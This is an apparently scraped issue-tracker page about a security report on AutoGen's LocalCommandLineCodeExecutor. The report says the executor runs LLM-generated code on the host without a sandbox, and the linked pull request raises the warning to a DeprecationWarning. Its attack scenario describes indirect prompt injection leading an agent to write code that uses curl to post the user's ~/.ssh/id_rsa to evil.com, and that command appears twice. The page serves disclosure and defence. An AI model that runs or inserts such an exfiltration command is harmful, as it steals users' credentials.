autogen - ✅(Solved) Fix [Security] LocalCommandLineCodeExecutor executes LLM-generated code without sandboxing [1 pull requests, 5 comments, 5 participants]

Official PRs (…)
ON THIS PAGE

Recommended Tools

×6

Utilities matched from this issue’s tags and category — try them while you read without losing context.

GitHub issue graph ai analysis

Paste a GitHub issue URL. We fetch that issue, discover linked issues from bodies/comments/timeline, collect linked pull requests, and produce a structured English report.

The report is written in English Markdown for sharing and archival.

Helpful · Quick feedback

Loading…
GitHub stats
microsoft/autogen#7462Fetched 2026-04-08 01:32:43
View on GitHub
Comments
5
Participants
5
Timeline
10
Reactions
0
Timeline (top)
commented ×5cross-referenced ×2mentioned ×1referenced ×1

The LocalCommandLineCodeExecutor writes LLM-generated code directly to disk and executes it as a local subprocess without any sandboxing, filesystem isolation, or network restrictions. While a UserWarning is emitted at construction time, no runtime security control prevents arbitrary code execution on the host machine.

We understand that LocalCommandLineCodeExecutor is intentionally provided as a convenience option alongside the sandboxed Docker alternative. This issue suggests strengthening the opt-in mechanism to reduce the risk of accidental production deployment without sandboxing.

Severity: HIGH Rule: AGENT-026 — Unsandboxed Execution of LLM-Generated Code OWASP Agentic Security Index: ASI-09 — Improper Output Handling Affected files:

  • python/packages/autogen-ext/src/autogen_ext/code_executors/local/__init__.py (lines 391-434)

Error Message

warnings.warn( warnings.warn(

Root Cause

The LocalCommandLineCodeExecutor writes LLM-generated code directly to disk and executes it as a local subprocess without any sandboxing, filesystem isolation, or network restrictions. While a UserWarning is emitted at construction time, no runtime security control prevents arbitrary code execution on the host machine.

We understand that LocalCommandLineCodeExecutor is intentionally provided as a convenience option alongside the sandboxed Docker alternative. This issue suggests strengthening the opt-in mechanism to reduce the risk of accidental production deployment without sandboxing.

Severity: HIGH Rule: AGENT-026 — Unsandboxed Execution of LLM-Generated Code OWASP Agentic Security Index: ASI-09 — Improper Output Handling Affected files:

  • python/packages/autogen-ext/src/autogen_ext/code_executors/local/__init__.py (lines 391-434)

Fix Action

Fixed

PR fix notes

PR #7467: fix(security): upgrade LocalCommandLineCodeExecutor warning to DeprecationWarning

Description (problem / solution / changelog)

Summary

Fixes #7462

The LocalCommandLineCodeExecutor currently emits a UserWarning at construction time to alert developers about unsandboxed code execution. However, UserWarning is easily suppressed in production configurations (e.g., python -W ignore, logging pipelines that filter warnings), which means the security message can be silently swallowed.

This PR makes the warning harder to accidentally suppress by:

  • Upgrading from UserWarning to DeprecationWarning — visible by default in __main__ contexts and not filtered by standard production warning configurations
  • Adding logger.warning() call — ensures the security message is visible in logging pipelines that don't capture Python warnings (dual-channel notification)
  • Improving the warning message — clearer description of the risk with a link to the code executors documentation

Changes

  • python/packages/autogen-ext/src/autogen_ext/code_executors/local/__init__.py:
    • Added module-level logger
    • Changed warning type from UserWarning to DeprecationWarning
    • Added logger.warning() for logging pipeline visibility
    • Improved warning message text with documentation link
  • python/packages/autogen-ext/tests/code_executors/test_commandline_code_executor.py:
    • Added test for the new DeprecationWarning behavior

Backward Compatibility

This change is fully backward compatible:

  • No API changes — constructor signature unchanged
  • No behavioral changes — code execution works identically
  • Warning is still emitted (just with a different type that is harder to suppress)
  • Existing code that catches UserWarning broadly will still work since DeprecationWarning is a separate category

Test plan

  • Existing tests should pass (warning type change does not affect restart test which uses a separate UserWarning)
  • New test verifies DeprecationWarning is emitted on construction
  • Manual verification: instantiate LocalCommandLineCodeExecutor and confirm warning is visible

🤖 Generated with Claude Code

Changed files

  • python/packages/autogen-ext/src/autogen_ext/code_executors/local/__init__.py (modified, +11/-4)
  • python/packages/autogen-ext/tests/code_executors/test_commandline_code_executor.py (modified, +5/-0)

Code Example

written_file = (self.work_dir / filename).resolve()
with written_file.open("w", encoding="utf-8") as f:
    f.write(code)  # <-- LLM-generated code written to disk
file_names.append(written_file)

# ... environment setup ...

program = sys.executable  # or lang_to_cmd(lang) for non-Python
extra_args = [str(written_file.absolute())]

task = asyncio.create_task(
    asyncio.create_subprocess_exec(
        program,
        *extra_args,               # <-- executed without sandboxing
        cwd=self.work_dir,
        stdout=asyncio.subprocess.PIPE,
        stderr=asyncio.subprocess.PIPE,
        env=env,
    )
)

---

warnings.warn(
    "Using LocalCommandLineCodeExecutor may execute code on the local machine which can be unsafe. "
    "For security, it is recommended to use DockerCommandLineCodeExecutor instead.",
    UserWarning,
    stacklevel=2,
)

---

import subprocess
   subprocess.run(["curl", "-X", "POST", "https://evil.com/exfil",
                    "-d", open(os.path.expanduser("~/.ssh/id_rsa")).read()])

---

# In local/__init__.py, line ~163:
warnings.warn(
    "LocalCommandLineCodeExecutor executes LLM-generated code directly on your machine "
    "without sandboxing. Consider using DockerCommandLineCodeExecutor for production use. "
    "See https://microsoft.github.io/autogen/stable/user-guide/agentchat-user-guide/tutorial/code-executors.html",
    DeprecationWarning,  # Changed from UserWarning — visible by default, harder to silence
    stacklevel=2,
)
RAW_BUFFERClick to expand / collapse

[Security] LocalCommandLineCodeExecutor executes LLM-generated code without sandboxing

Summary

The LocalCommandLineCodeExecutor writes LLM-generated code directly to disk and executes it as a local subprocess without any sandboxing, filesystem isolation, or network restrictions. While a UserWarning is emitted at construction time, no runtime security control prevents arbitrary code execution on the host machine.

We understand that LocalCommandLineCodeExecutor is intentionally provided as a convenience option alongside the sandboxed Docker alternative. This issue suggests strengthening the opt-in mechanism to reduce the risk of accidental production deployment without sandboxing.

Severity: HIGH Rule: AGENT-026 — Unsandboxed Execution of LLM-Generated Code OWASP Agentic Security Index: ASI-09 — Improper Output Handling Affected files:

  • python/packages/autogen-ext/src/autogen_ext/code_executors/local/__init__.py (lines 391-434)

Vulnerability Details

The executor writes LLM-generated code to a temporary file and runs it directly via asyncio.create_subprocess_exec:

Affected code (local/__init__.py:391-434):

written_file = (self.work_dir / filename).resolve()
with written_file.open("w", encoding="utf-8") as f:
    f.write(code)  # <-- LLM-generated code written to disk
file_names.append(written_file)

# ... environment setup ...

program = sys.executable  # or lang_to_cmd(lang) for non-Python
extra_args = [str(written_file.absolute())]

task = asyncio.create_task(
    asyncio.create_subprocess_exec(
        program,
        *extra_args,               # <-- executed without sandboxing
        cwd=self.work_dir,
        stdout=asyncio.subprocess.PIPE,
        stderr=asyncio.subprocess.PIPE,
        env=env,
    )
)

The only "safeguard" is a UserWarning at initialization (__init__.py:163-168):

warnings.warn(
    "Using LocalCommandLineCodeExecutor may execute code on the local machine which can be unsafe. "
    "For security, it is recommended to use DockerCommandLineCodeExecutor instead.",
    UserWarning,
    stacklevel=2,
)

A warning is informational, not a security control. It is silently swallowed in most production configurations (e.g., when -W ignore is set or in logging pipelines that filter warnings).

Attack Scenario

  1. A user deploys an AutoGen agent using LocalCommandLineCodeExecutor (following quickstart examples or for simplicity)
  2. The agent interacts with untrusted data (e.g., user messages, web content, documents)
  3. Through indirect prompt injection, the LLM is tricked into generating malicious code:
    import subprocess
    subprocess.run(["curl", "-X", "POST", "https://evil.com/exfil",
                     "-d", open(os.path.expanduser("~/.ssh/id_rsa")).read()])
  4. The code is written to disk and executed with full host privileges

Impact

  • Full system compromise: Arbitrary code execution with the privileges of the Python process
  • Credential theft: Access to SSH keys, cloud credentials, API tokens, environment variables
  • Lateral movement: Ability to scan internal networks, establish reverse shells, pivot to other systems
  • Data destruction: Unrestricted filesystem access (read, write, delete)

Suggested Fix

Upgrade the warning from UserWarning to DeprecationWarning, which is shown by default in __main__ contexts and cannot be silently filtered by standard production configurations:

# In local/__init__.py, line ~163:
warnings.warn(
    "LocalCommandLineCodeExecutor executes LLM-generated code directly on your machine "
    "without sandboxing. Consider using DockerCommandLineCodeExecutor for production use. "
    "See https://microsoft.github.io/autogen/stable/user-guide/agentchat-user-guide/tutorial/code-executors.html",
    DeprecationWarning,  # Changed from UserWarning — visible by default, harder to silence
    stacklevel=2,
)

Fix approach: A single-line change (UserWarningDeprecationWarning) that makes the warning significantly harder to accidentally suppress while maintaining full backward compatibility.

Future Considerations

For longer-term hardening, the team may also want to consider:

  1. Explicit opt-in: Add a require_explicit_opt_in parameter that raises ValueError unless the user explicitly acknowledges the risk
  2. Static analysis gate: Before execution, scan LLM-generated code for dangerous imports (os, subprocess, socket, shutil) and require explicit approval
  3. Filesystem restriction: Use work_dir as a boundary, rejecting code that references paths outside it
  4. Deprecation path: Consider defaulting to Docker/Azure executors in future major versions

Detection

This issue was identified by agent-audit, an open-source security scanner for AI agent code. agent-audit detects agent-specific vulnerabilities that traditional SAST tools (Semgrep, Bandit) miss — including unsafe tool definitions, MCP configuration issues, and trust boundary violations mapped to the OWASP Agentic Security Index.

References

extent analysis

Fix Plan

To address the security issue, we will:

  • Upgrade the warning from UserWarning to DeprecationWarning to make it more visible and harder to silence.
  • Consider implementing additional security measures, such as explicit opt-in, static analysis gate, filesystem restriction, and deprecation path.

Code Changes

# In local/__init__.py, line ~163:
warnings.warn(
    "LocalCommandLineCodeExecutor executes LLM-generated code directly on your machine "
    "without sandboxing. Consider using DockerCommandLineCodeExecutor for production use. "
    "See https://microsoft.github.io/autogen/stable/user-guide/agentchat-user-guide/tutorial/code-executors.html",
    DeprecationWarning,  # Changed from UserWarning — visible by default, harder to silence
    stacklevel=2,
)

Verification

To verify that the fix worked:

  1. Run the LocalCommandLineCodeExecutor with the updated warning.
  2. Check that the DeprecationWarning is displayed and not silently ignored.
  3. Test the executor with a sample LLM-generated code to ensure it still functions as expected.

Extra Tips

  • Consider using the DockerCommandLineCodeExecutor instead of LocalCommandLineCodeExecutor for production use to ensure better security and isolation.
  • Regularly review and update your code to ensure you are using the latest security best practices and guidelines.
  • Use tools like agent-audit to detect and identify potential security vulnerabilities in your AI agent code.

Vote matrix · Quick signals

Works
Did the solution work? Tap to confirm.
Easy Fix
Was it a quick fix?
Time Saver
Did it save you time?
Blocking
Was it severely blocking?
Common Issue
Are others likely hitting this too?
Flaky / Intermittent
Is it intermittent?
Verified / Reproducible
Can you reproduce it reliably?
Loading…

Still need to ship something?

×6

Another batch ranked right after the header list — different links, same matching logic.

Back to top recommendations

TRENDING